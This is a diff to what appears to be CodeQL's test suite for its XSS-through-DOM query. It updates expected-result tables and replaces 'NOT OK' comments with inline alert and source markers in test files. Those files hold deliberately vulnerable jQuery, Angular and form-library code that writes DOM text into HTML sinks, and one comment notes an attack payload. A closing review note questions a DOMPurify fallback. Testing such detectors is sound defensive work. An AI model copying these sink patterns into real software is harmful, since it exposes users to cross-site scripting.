$("inpu ... 0).name | DOM text | +| xss-through-dom.js:77:4:77:11 | selector | xss-through-dom.js:73:20:73:41 | $("inpu ... 
0).name | xss-through-dom.js:77:4:77:11 | selector | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:73:20:73:41 | $("inpu ... 0).name | DOM text | +| xss-through-dom.js:79:4:79:34 | documen ... t.value | xss-through-dom.js:79:4:79:34 | documen ... t.value | xss-through-dom.js:79:4:79:34 | documen ... t.value | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:79:4:79:34 | documen ... t.value | DOM text | +| xss-through-dom.js:81:17:81:43 | $('#foo ... rText') | xss-through-dom.js:81:17:81:43 | $('#foo ... rText') | xss-through-dom.js:81:17:81:43 | $('#foo ... rText') | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:81:17:81:43 | $('#foo ... rText') | DOM text | +| xss-through-dom.js:86:16:86:37 | anser.a ... l(text) | xss-through-dom.js:84:15:84:30 | $("text").text() | xss-through-dom.js:86:16:86:37 | anser.a ... l(text) | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:84:15:84:30 | $("text").text() | DOM text | +| xss-through-dom.js:87:16:87:40 | new ans ... s(text) | xss-through-dom.js:84:15:84:30 | $("text").text() | xss-through-dom.js:87:16:87:40 | new ans ... s(text) | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:84:15:84:30 | $("text").text() | DOM text | +| xss-through-dom.js:93:16:93:46 | $("#foo ... ].value | xss-through-dom.js:93:16:93:46 | $("#foo ... ].value | xss-through-dom.js:93:16:93:46 | $("#foo ... ].value | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:93:16:93:46 | $("#foo ... ].value | DOM text | +| xss-through-dom.js:96:17:96:47 | $("#foo ... ].value | xss-through-dom.js:96:17:96:47 | $("#foo ... ].value | xss-through-dom.js:96:17:96:47 | $("#foo ... ].value | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:96:17:96:47 | $("#foo ... 
].value | DOM text | +| xss-through-dom.js:109:31:109:70 | "" | xss-through-dom.js:109:45:109:55 | this.el.src | xss-through-dom.js:109:31:109:70 | "" | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:109:45:109:55 | this.el.src | DOM text | +| xss-through-dom.js:115:16:115:18 | src | xss-through-dom.js:114:17:114:52 | documen ... k").src | xss-through-dom.js:115:16:115:18 | src | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:114:17:114:52 | documen ... k").src | DOM text | +| xss-through-dom.js:120:23:120:45 | ev.targ ... 0].name | xss-through-dom.js:120:23:120:37 | ev.target.files | xss-through-dom.js:120:23:120:45 | ev.targ ... 0].name | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:120:23:120:37 | ev.target.files | DOM text | +| xss-through-dom.js:122:33:122:71 | URL.cre ... les[0]) | xss-through-dom.js:122:53:122:67 | ev.target.files | xss-through-dom.js:122:33:122:71 | URL.cre ... les[0]) | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:122:53:122:67 | ev.target.files | DOM text | +| xss-through-dom.js:131:19:131:26 | linkText | xss-through-dom.js:130:17:130:37 | wSelect ... tring() | xss-through-dom.js:131:19:131:26 | linkText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:130:17:130:37 | wSelect ... tring() | DOM text | +| xss-through-dom.js:131:19:131:26 | linkText | xss-through-dom.js:130:42:130:62 | dSelect ... tring() | xss-through-dom.js:131:19:131:26 | linkText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:130:42:130:62 | dSelect ... tring() | DOM text | +| xss-through-dom.js:132:16:132:23 | linkText | xss-through-dom.js:130:17:130:37 | wSelect ... tring() | xss-through-dom.js:132:16:132:23 | linkText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:130:17:130:37 | wSelect ... 
tring() | DOM text | +| xss-through-dom.js:132:16:132:23 | linkText | xss-through-dom.js:130:42:130:62 | dSelect ... tring() | xss-through-dom.js:132:16:132:23 | linkText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:130:42:130:62 | dSelect ... tring() | DOM text | +| xss-through-dom.js:140:19:140:21 | src | xss-through-dom.js:139:17:139:52 | documen ... k").src | xss-through-dom.js:140:19:140:21 | src | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:139:17:139:52 | documen ... k").src | DOM text | +| xss-through-dom.js:141:25:141:27 | src | xss-through-dom.js:139:17:139:52 | documen ... k").src | xss-through-dom.js:141:25:141:27 | src | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:139:17:139:52 | documen ... k").src | DOM text | +| xss-through-dom.js:150:24:150:26 | src | xss-through-dom.js:139:17:139:52 | documen ... k").src | xss-through-dom.js:150:24:150:26 | src | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:139:17:139:52 | documen ... k").src | DOM text | +| xss-through-dom.js:155:27:155:29 | msg | xss-through-dom.js:159:34:159:52 | $("textarea").val() | xss-through-dom.js:155:27:155:29 | msg | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:159:34:159:52 | $("textarea").val() | DOM text | edges | angular.ts:12:5:12:23 | field: string = ""; | angular.ts:33:24:33:33 | this.field | provenance | | | angular.ts:29:24:29:33 | form.value | angular.ts:29:24:29:37 | form.value.foo | provenance | | 
@@ -131,52 +180,3 @@ nodes | xss-through-dom.js:155:27:155:29 | msg | semmle.label | msg | | xss-through-dom.js:159:34:159:52 | $("textarea").val() | semmle.label | $("textarea").val() | subpaths -#select -| angular.ts:16:24:16:41 | event.target.value | angular.ts:16:24:16:41 | event.target.value | angular.ts:16:24:16:41 | event.target.value | $@ is reinterpreted as HTML without escaping meta-characters. | angular.ts:16:24:16:41 | event.target.value | DOM text | -| angular.ts:20:24:20:35 | target.value | angular.ts:20:24:20:35 | target.value | angular.ts:20:24:20:35 | target.value | $@ is reinterpreted as HTML without escaping meta-characters. | angular.ts:20:24:20:35 | target.value | DOM text | -| angular.ts:29:24:29:37 | form.value.foo | angular.ts:29:24:29:33 | form.value | angular.ts:29:24:29:37 | form.value.foo | $@ is reinterpreted as HTML without escaping meta-characters. | angular.ts:29:24:29:33 | form.value | DOM text | -| angular.ts:33:24:33:33 | this.field | angular.ts:12:5:12:23 | field: string = ""; | angular.ts:33:24:33:33 | this.field | $@ is reinterpreted as HTML without escaping meta-characters. | angular.ts:12:5:12:23 | field: string = ""; | DOM text | -| forms.js:9:31:9:40 | values.foo | forms.js:8:23:8:28 | values | forms.js:9:31:9:40 | values.foo | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:8:23:8:28 | values | DOM text | -| forms.js:12:31:12:40 | values.bar | forms.js:11:24:11:29 | values | forms.js:12:31:12:40 | values.bar | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:11:24:11:29 | values | DOM text | -| forms.js:25:23:25:34 | values.email | forms.js:24:15:24:20 | values | forms.js:25:23:25:34 | values.email | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:24:15:24:20 | values | DOM text | -| forms.js:29:23:29:34 | values.email | forms.js:28:20:28:25 | values | forms.js:29:23:29:34 | values.email | $@ is reinterpreted as HTML without escaping meta-characters. 
| forms.js:28:20:28:25 | values | DOM text | -| forms.js:35:19:35:30 | values.email | forms.js:34:13:34:18 | values | forms.js:35:19:35:30 | values.email | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:34:13:34:18 | values | DOM text | -| forms.js:45:21:45:33 | values.stooge | forms.js:44:21:44:26 | values | forms.js:45:21:45:33 | values.stooge | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:44:21:44:26 | values | DOM text | -| forms.js:57:19:57:32 | e.target.value | forms.js:57:19:57:32 | e.target.value | forms.js:57:19:57:32 | e.target.value | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:57:19:57:32 | e.target.value | DOM text | -| forms.js:72:19:72:27 | data.name | forms.js:71:21:71:24 | data | forms.js:72:19:72:27 | data.name | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:71:21:71:24 | data | DOM text | -| forms.js:93:25:93:35 | values.name | forms.js:92:26:92:36 | getValues() | forms.js:93:25:93:35 | values.name | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:92:26:92:36 | getValues() | DOM text | -| forms.js:103:23:103:36 | e.target.value | forms.js:103:23:103:36 | e.target.value | forms.js:103:23:103:36 | e.target.value | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:103:23:103:36 | e.target.value | DOM text | -| forms.js:107:23:107:36 | e.target.value | forms.js:107:23:107:36 | e.target.value | forms.js:107:23:107:36 | e.target.value | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:107:23:107:36 | e.target.value | DOM text | -| xss-through-dom.js:2:16:2:34 | $("textarea").val() | xss-through-dom.js:2:16:2:34 | $("textarea").val() | xss-through-dom.js:2:16:2:34 | $("textarea").val() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:2:16:2:34 | $("textarea").val() | DOM text | -| xss-through-dom.js:4:16:4:40 | $(".som ... 
.text() | xss-through-dom.js:4:16:4:40 | $(".som ... .text() | xss-through-dom.js:4:16:4:40 | $(".som ... .text() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:4:16:4:40 | $(".som ... .text() | DOM text | -| xss-through-dom.js:8:16:8:53 | $(".som ... arget") | xss-through-dom.js:8:16:8:53 | $(".som ... arget") | xss-through-dom.js:8:16:8:53 | $(".som ... arget") | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:8:16:8:53 | $(".som ... arget") | DOM text | -| xss-through-dom.js:11:3:11:42 | documen ... nerText | xss-through-dom.js:11:3:11:42 | documen ... nerText | xss-through-dom.js:11:3:11:42 | documen ... nerText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:11:3:11:42 | documen ... nerText | DOM text | -| xss-through-dom.js:19:3:19:44 | documen ... Content | xss-through-dom.js:19:3:19:44 | documen ... Content | xss-through-dom.js:19:3:19:44 | documen ... Content | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:19:3:19:44 | documen ... Content | DOM text | -| xss-through-dom.js:23:3:23:48 | documen ... ].value | xss-through-dom.js:23:3:23:48 | documen ... ].value | xss-through-dom.js:23:3:23:48 | documen ... ].value | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:23:3:23:48 | documen ... ].value | DOM text | -| xss-through-dom.js:27:3:27:61 | documen ... arget') | xss-through-dom.js:27:3:27:61 | documen ... arget') | xss-through-dom.js:27:3:27:61 | documen ... arget') | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:27:3:27:61 | documen ... arget') | DOM text | -| xss-through-dom.js:51:30:51:48 | $("textarea").val() | xss-through-dom.js:51:30:51:48 | $("textarea").val() | xss-through-dom.js:51:30:51:48 | $("textarea").val() | $@ is reinterpreted as HTML without escaping meta-characters. 
| xss-through-dom.js:51:30:51:48 | $("textarea").val() | DOM text | -| xss-through-dom.js:54:31:54:49 | $("textarea").val() | xss-through-dom.js:54:31:54:49 | $("textarea").val() | xss-through-dom.js:54:31:54:49 | $("textarea").val() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:54:31:54:49 | $("textarea").val() | DOM text | -| xss-through-dom.js:56:30:56:51 | $("inpu ... 0).name | xss-through-dom.js:56:30:56:51 | $("inpu ... 0).name | xss-through-dom.js:56:30:56:51 | $("inpu ... 0).name | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:56:30:56:51 | $("inpu ... 0).name | DOM text | -| xss-through-dom.js:57:30:57:67 | $("inpu ... "name") | xss-through-dom.js:57:30:57:67 | $("inpu ... "name") | xss-through-dom.js:57:30:57:67 | $("inpu ... "name") | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:57:30:57:67 | $("inpu ... "name") | DOM text | -| xss-through-dom.js:61:30:61:69 | $(docum ... value") | xss-through-dom.js:61:30:61:69 | $(docum ... value") | xss-through-dom.js:61:30:61:69 | $(docum ... value") | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:61:30:61:69 | $(docum ... value") | DOM text | -| xss-through-dom.js:64:30:64:40 | valMethod() | xss-through-dom.js:64:30:64:40 | valMethod() | xss-through-dom.js:64:30:64:40 | valMethod() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:64:30:64:40 | valMethod() | DOM text | -| xss-through-dom.js:71:11:71:32 | $("inpu ... 0).name | xss-through-dom.js:71:11:71:32 | $("inpu ... 0).name | xss-through-dom.js:71:11:71:32 | $("inpu ... 0).name | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:71:11:71:32 | $("inpu ... 0).name | DOM text | -| xss-through-dom.js:77:4:77:11 | selector | xss-through-dom.js:73:20:73:41 | $("inpu ... 
0).name | xss-through-dom.js:77:4:77:11 | selector | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:73:20:73:41 | $("inpu ... 0).name | DOM text | -| xss-through-dom.js:79:4:79:34 | documen ... t.value | xss-through-dom.js:79:4:79:34 | documen ... t.value | xss-through-dom.js:79:4:79:34 | documen ... t.value | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:79:4:79:34 | documen ... t.value | DOM text | -| xss-through-dom.js:81:17:81:43 | $('#foo ... rText') | xss-through-dom.js:81:17:81:43 | $('#foo ... rText') | xss-through-dom.js:81:17:81:43 | $('#foo ... rText') | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:81:17:81:43 | $('#foo ... rText') | DOM text | -| xss-through-dom.js:86:16:86:37 | anser.a ... l(text) | xss-through-dom.js:84:15:84:30 | $("text").text() | xss-through-dom.js:86:16:86:37 | anser.a ... l(text) | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:84:15:84:30 | $("text").text() | DOM text | -| xss-through-dom.js:87:16:87:40 | new ans ... s(text) | xss-through-dom.js:84:15:84:30 | $("text").text() | xss-through-dom.js:87:16:87:40 | new ans ... s(text) | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:84:15:84:30 | $("text").text() | DOM text | -| xss-through-dom.js:93:16:93:46 | $("#foo ... ].value | xss-through-dom.js:93:16:93:46 | $("#foo ... ].value | xss-through-dom.js:93:16:93:46 | $("#foo ... ].value | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:93:16:93:46 | $("#foo ... ].value | DOM text | -| xss-through-dom.js:96:17:96:47 | $("#foo ... ].value | xss-through-dom.js:96:17:96:47 | $("#foo ... ].value | xss-through-dom.js:96:17:96:47 | $("#foo ... ].value | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:96:17:96:47 | $("#foo ... 
].value | DOM text | -| xss-through-dom.js:109:31:109:70 | "" | xss-through-dom.js:109:45:109:55 | this.el.src | xss-through-dom.js:109:31:109:70 | "" | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:109:45:109:55 | this.el.src | DOM text | -| xss-through-dom.js:115:16:115:18 | src | xss-through-dom.js:114:17:114:52 | documen ... k").src | xss-through-dom.js:115:16:115:18 | src | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:114:17:114:52 | documen ... k").src | DOM text | -| xss-through-dom.js:120:23:120:45 | ev.targ ... 0].name | xss-through-dom.js:120:23:120:37 | ev.target.files | xss-through-dom.js:120:23:120:45 | ev.targ ... 0].name | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:120:23:120:37 | ev.target.files | DOM text | -| xss-through-dom.js:122:33:122:71 | URL.cre ... les[0]) | xss-through-dom.js:122:53:122:67 | ev.target.files | xss-through-dom.js:122:33:122:71 | URL.cre ... les[0]) | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:122:53:122:67 | ev.target.files | DOM text | -| xss-through-dom.js:131:19:131:26 | linkText | xss-through-dom.js:130:17:130:37 | wSelect ... tring() | xss-through-dom.js:131:19:131:26 | linkText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:130:17:130:37 | wSelect ... tring() | DOM text | -| xss-through-dom.js:131:19:131:26 | linkText | xss-through-dom.js:130:42:130:62 | dSelect ... tring() | xss-through-dom.js:131:19:131:26 | linkText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:130:42:130:62 | dSelect ... tring() | DOM text | -| xss-through-dom.js:132:16:132:23 | linkText | xss-through-dom.js:130:17:130:37 | wSelect ... tring() | xss-through-dom.js:132:16:132:23 | linkText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:130:17:130:37 | wSelect ... 
tring() | DOM text | -| xss-through-dom.js:132:16:132:23 | linkText | xss-through-dom.js:130:42:130:62 | dSelect ... tring() | xss-through-dom.js:132:16:132:23 | linkText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:130:42:130:62 | dSelect ... tring() | DOM text | -| xss-through-dom.js:140:19:140:21 | src | xss-through-dom.js:139:17:139:52 | documen ... k").src | xss-through-dom.js:140:19:140:21 | src | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:139:17:139:52 | documen ... k").src | DOM text | -| xss-through-dom.js:141:25:141:27 | src | xss-through-dom.js:139:17:139:52 | documen ... k").src | xss-through-dom.js:141:25:141:27 | src | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:139:17:139:52 | documen ... k").src | DOM text | -| xss-through-dom.js:150:24:150:26 | src | xss-through-dom.js:139:17:139:52 | documen ... k").src | xss-through-dom.js:150:24:150:26 | src | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:139:17:139:52 | documen ... k").src | DOM text | -| xss-through-dom.js:155:27:155:29 | msg | xss-through-dom.js:159:34:159:52 | $("textarea").val() | xss-through-dom.js:155:27:155:29 | msg | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:159:34:159:52 | $("textarea").val() | DOM text | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/XssThroughDom.qlref b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/XssThroughDom.qlref index 3226decda378..30db379de212 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/XssThroughDom.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/XssThroughDom.qlref @@ -1 +1,2 @@ -Security/CWE-079/XssThroughDom.ql +query: Security/CWE-079/XssThroughDom.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts index 15207cb5059c..084950e8e08e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts @@ -9,28 +9,28 @@ import { NgForm } from "@angular/forms"; ` }) export class Foo { - field: string = ""; + field: string = ""; // $ Source safeField: string = ""; setInput1(event) { - document.write(event.target.value); // NOT OK + document.write(event.target.value); // $ Alert } setInput2(target) { - document.write(target.value); // NOT OK + document.write(target.value); // $ Alert } setOtherInput(e) { - document.write(e.target.value); // OK - document.write(e.value); // OK + document.write(e.target.value); + document.write(e.value); } blah(form: NgForm) { - document.write(form.value.foo); // NOT OK + document.write(form.value.foo); // $ Alert } useField() { - document.write(this.field); // NOT OK - document.write(this.safeField); // OK + document.write(this.field); // $ Alert + document.write(this.safeField); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js index b91b7490bb2d..e57ef84dc429 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js @@ -5,11 +5,11 @@ const FormikBasic = () => (
    { - $("#id").html(values.foo); // NOT OK + validate={values => { // $ Source + $("#id").html(values.foo); // $ Alert }} - onSubmit={(values, { setSubmitting }) => { - $("#id").html(values.bar); // NOT OK + onSubmit={(values, { setSubmitting }) => { // $ Source + $("#id").html(values.bar); // $ Alert }} > {(inputs) => ( @@ -21,28 +21,28 @@ const FormikBasic = () => ( const FormikEnhanced = withFormik({ mapPropsToValues: () => ({ name: '' }), - validate: values => { - $("#id").html(values.email); // NOT OK + validate: values => { // $ Source + $("#id").html(values.email); // $ Alert }, - handleSubmit: (values, { setSubmitting }) => { - $("#id").html(values.email); // NOT OK + handleSubmit: (values, { setSubmitting }) => { // $ Source + $("#id").html(values.email); // $ Alert } })(MyForm); (function () { - const { values, submitForm } = useFormikContext(); - $("#id").html(values.email); // NOT OK + const { values, submitForm } = useFormikContext(); // $ Source + $("#id").html(values.email); // $ Alert - $("#id").html(submitForm.email); // OK + $("#id").html(submitForm.email); }) import { Form } from 'react-final-form' const App = () => (
    { - $("#id").html(values.stooge); // NOT OK + onSubmit={async values => { // $ Source + $("#id").html(values.stooge); // $ Alert }} initialValues={{ stooge: 'larry', employed: false }} render={({ handleSubmit, form, submitting, pristine, values }) => ( @@ -54,7 +54,7 @@ const App = () => ( ); function plainSubmit(e) { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert } const plainReact = () => ( @@ -68,8 +68,8 @@ import { useForm } from 'react-hook-form'; function HookForm() { const { register, handleSubmit, errors } = useForm(); // initialize the hook - const onSubmit = (data) => { - $("#id").html(data.name); // NOT OK + const onSubmit = (data) => { // $ Source + $("#id").html(data.name); // $ Alert }; return ( @@ -89,8 +89,8 @@ function HookForm2() { @@ -100,10 +100,10 @@ function HookForm2() { function vanillaJS() { document.querySelector("form.myform").addEventListener("submit", e => { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert }); document.querySelector("form.myform").onsubmit = function (e) { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js index 354194a597d9..8082f8ef0ab9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js 
@@ -1,35 +1,35 @@ (function () { - $("#id").html($("textarea").val()); // NOT OK. + $("#id").html($("textarea").val()); // $ Alert - $("#id").html($(".some-element").text()); // NOT OK. + $("#id").html($(".some-element").text()); // $ Alert - $("#id").html($(".some-element").attr("foo", "bar")); // OK. - $("#id").html($(".some-element").attr({"foo": "bar"})); // OK. - $("#id").html($(".some-element").attr("data-target")); // NOT OK. + $("#id").html($(".some-element").attr("foo", "bar")); + $("#id").html($(".some-element").attr({"foo": "bar"})); + $("#id").html($(".some-element").attr("data-target")); // $ Alert $("#id").html( - document.getElementById("foo").innerText // NOT OK. + document.getElementById("foo").innerText // $ Alert ); $("#id").html( - document.getElementById("foo").innerHTML // OK - only repeats existing XSS. + document.getElementById("foo").innerHTML // OK - only repeats existing XSS. ); $("#id").html( - document.getElementById("foo").textContent // NOT OK. + document.getElementById("foo").textContent // $ Alert ); $("#id").html( - document.querySelectorAll("textarea")[0].value // NOT OK. + document.querySelectorAll("textarea")[0].value // $ Alert ); $("#id").html( - document.getElementById('div1').getAttribute('data-target') // NOT OK + document.getElementById('div1').getAttribute('data-target') // $ Alert ); function safe1(x) { // overloaded function. if (x.jquery) { - var foo = $(x); // OK + var foo = $(x); } } @@ -37,7 +37,7 @@ function safe2(x) { // overloaded function. if (typeof x === "object") { - var foo = $(x); // OK + var foo = $(x); } } safe2($("textarea").val()); 
@@ -48,52 +48,52 @@ ); - $("#id").get(0).innerHTML = $("textarea").val(); // NOT OK. + $("#id").get(0).innerHTML = $("textarea").val(); // $ Alert var base = $("#id"); - base[html ? 'html' : 'text']($("textarea").val()); // NOT OK. + base[html ? 'html' : 'text']($("textarea").val()); // $ Alert - $("#id").get(0).innerHTML = $("input").get(0).name; // NOT OK. - $("#id").get(0).innerHTML = $("input").get(0).getAttribute("name"); // NOT OK. + $("#id").get(0).innerHTML = $("input").get(0).name; // $ Alert + $("#id").get(0).innerHTML = $("input").get(0).getAttribute("name"); // $ Alert - $("#id").get(0).innerHTML = $("input").getAttribute("id"); // OK. + $("#id").get(0).innerHTML = $("input").getAttribute("id"); - $("#id").get(0).innerHTML = $(document).find("option").attr("value"); // NOT OK. + $("#id").get(0).innerHTML = $(document).find("option").attr("value"); // $ Alert var valMethod = $("textarea").val; - $("#id").get(0).innerHTML = valMethod(); // NOT OK + $("#id").get(0).innerHTML = valMethod(); // $ Alert var myValue = $(document).find("option").attr("value"); if(myValue.property) { - $("#id").get(0).innerHTML = myValue; // OK. + $("#id").get(0).innerHTML = myValue; } - $.jGrowl($("input").get(0).name); // NOT OK. 
+ $.jGrowl($("input").get(0).name); // $ Alert - let selector = $("input").get(0).name; + let selector = $("input").get(0).name; // $ Source if (something()) { selector = $("textarea").val || '' } - $(selector); // NOT OK + $(selector); // $ Alert - $(document.my_form.my_input.value); // NOT OK + $(document.my_form.my_input.value); // $ Alert - $("#id").html( $('#foo').prop('innerText') ); // NOT OK + $("#id").html( $('#foo').prop('innerText') ); // $ Alert const anser = require("anser"); - const text = $("text").text(); + const text = $("text").text(); // $ Source - $("#id").html(anser.ansiToHtml(text)); // NOT OK - $("#id").html(new anser().process(text)); // NOT OK + $("#id").html(anser.ansiToHtml(text)); // $ Alert + $("#id").html(new anser().process(text)); // $ Alert $("section h1").each(function(){ - $("nav ul").append("Section"); // OK + $("nav ul").append("Section"); }); - $("#id").html($("#foo").find(".bla")[0].value); // NOT OK. + $("#id").html($("#foo").find(".bla")[0].value); // $ Alert for (var i = 0; i < foo.length; i++) { - $("#id").html($("#foo").find(".bla")[i].value); // NOT OK. + $("#id").html($("#foo").find(".bla")[i].value); // $ Alert } })(); @@ -106,20 +106,20 @@ class Super { class Sub extends Super { constructor() { super(); - $("#id").get(0).innerHTML = "foo"; // NOT OK. Attack: `` + $("#id").get(0).innerHTML = "foo"; // $ Alert - Attack: `` } } (function () { - const src = document.getElementById("#link").src; - $("#id").html(src); // NOT OK. + const src = document.getElementById("#link").src; // $ Source + $("#id").html(src); // $ Alert - $("#id").attr("src", src); // OK + $("#id").attr("src", src); $("input.foo")[0].onchange = function (ev) { - $("#id").html(ev.target.files[0].name); // NOT OK. + $("#id").html(ev.target.files[0].name); // $ Alert - $("img#id").attr("src", URL.createObjectURL(ev.target.files[0])); // NOT OK + $("img#id").attr("src", URL.createObjectURL(ev.target.files[0])); // $ Alert } })(); 
@@ -127,36 +127,36 @@ class Sub extends Super { let elem = document.createElement('a'); const wSelection = getSelection(); const dSelection = document.getSelection(); - let linkText = wSelection.toString() || dSelection.toString() || ''; - elem.innerHTML = linkText; // NOT OK - $("#id").html(linkText); // NOT OK - elem.innerText = linkText; // OK + let linkText = wSelection.toString() || dSelection.toString() || ''; // $ Source + elem.innerHTML = linkText; // $ Alert + $("#id").html(linkText); // $ Alert + elem.innerText = linkText; })(); const cashDom = require("cash-dom"); (function () { - const src = document.getElementById("#link").src; - cash("#id").html(src); // NOT OK. - cashDom("#id").html(src); // NOT OK + const src = document.getElementById("#link").src; // $ Source + cash("#id").html(src); // $ Alert + cashDom("#id").html(src); // $ Alert var DOMPurify = { sanitize: function (src) { return src; // to model spuriously finding an edge. The below is still OK. } }; - cashDom("#id").html(DOMPurify ? DOMPurify.sanitize(src) : src); // OK + cashDom("#id").html(DOMPurify ? DOMPurify.sanitize(src) : src); - $("", { html: src }).appendTo("#id"); // NOT OK + $("", { html: src }).appendTo("#id"); // $ Alert function foo() { window.VeryUniqueXssTestName = { send: function (msg) { - $("#id").html(msg); // NOT OK + $("#id").html(msg); // $ Alert }, }; - VeryUniqueXssTestName.send($("textarea").val()); + VeryUniqueXssTestName.send($("textarea").val()); // $ Source } foo() })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/SqlInjection.expected b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/SqlInjection.expected index 3a4a7ef0481c..b6710ee92f5a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/SqlInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/SqlInjection.expected 
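Review bot: With `// OK` dropped from `cashDom("#id").html(DOMPurify ? DOMPurify.sanitize(src) : src);`, the test now silently expects no alert on a line whose else-branch passes `src` through unsanitized. The only rationale left is the comment inside the stub (`to model spuriously finding an edge`), which covers the identity `sanitize` but not the `: src` fallback. If accepting the fallback is intended, say so on the sink line, e.g. `// OK - sanitized whenever DOMPurify is defined; the fallback branch is intentionally not flagged`. If it is not intended, this line presumably needs its own expectation, since a sanitizer that fails open when the library is missing is a pattern worth reporting.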
